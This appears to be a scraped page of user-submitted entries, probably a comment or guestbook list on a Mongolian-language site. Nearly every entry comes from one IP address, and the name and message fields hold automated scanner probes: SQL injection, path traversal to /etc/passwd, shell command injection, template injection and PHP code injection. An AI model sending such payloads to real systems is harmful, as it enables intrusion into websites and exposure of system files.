 • admin 194.163.191.42 480 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 480 өдөр

  123456
 • /etc/passwd 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1401195970')))>'0 194.163.191.42 480 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 480 өдөр

  123456
 • admin"and"w"="q 194.163.191.42 480 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1351962177'))) 194.163.191.42 480 өдөр

  123456
 • admin$(expr 813886646 + 871108775) 194.163.191.42 480 өдөр

  123456
 • <%- 858876351+879532533 %> 194.163.191.42 480 өдөр

  123456
 • admin/**/and/**/cast(md5('1183179251')as/**/int)>0 194.163.191.42 480 өдөр

  123456
 • admin"and"w"="w 194.163.191.42 480 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 480 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1990521211)as/**/int))>'0 194.163.191.42 480 өдөр

  123456
 • admin|expr 849180897 + 832143553 194.163.191.42 480 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 480 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 480 өдөр

  123456
 • admin expr 831519194 + 800793649 194.163.191.42 480 өдөр

  123456
 • admin'and'o'='p 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  '-var_dump(md5(978071489))-'
 • ../../../../../../etc/passwd 194.163.191.42 480 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1358745858))) 194.163.191.42 480 өдөр

  123456
 • #set($c=806304389+888419510)${c}$c 194.163.191.42 480 өдөр

  123456
 • admin'and'w'='w 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  ${@var_dump(md5(403937256))};
 • admin"and/**/extractvalue(1,concat(char(126),md5(1803015692)))and" 194.163.191.42 480 өдөр

  123456
 • ${(834884149+814780898)?c} 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  expr 871182162 + 896323113
 • admin'and/**/extractvalue(1,concat(char(126),md5(1347997541)))and' 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • '-var_dump(md5(557539267))-' 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  ${816658725+866037068}
 • ${966693491+957818108} 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456&set /A 841404043+999134016
 • psrfvcuyjvfhvhycaajb 194.163.191.42 480 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456$(expr 918049692 + 882782270)
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456|expr 940998113 + 897032480
 • admin 194.163.191.42 480 өдөр

  123456
 • ${@var_dump(md5(898279567))}; 194.163.191.42 480 өдөр

  123456
 • /*1*/{{944966160+808434373}} 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456 expr 927237174 + 898517154
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  psrfvcuyjvfhvhycaajb
 • ${852018427+937156150} 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456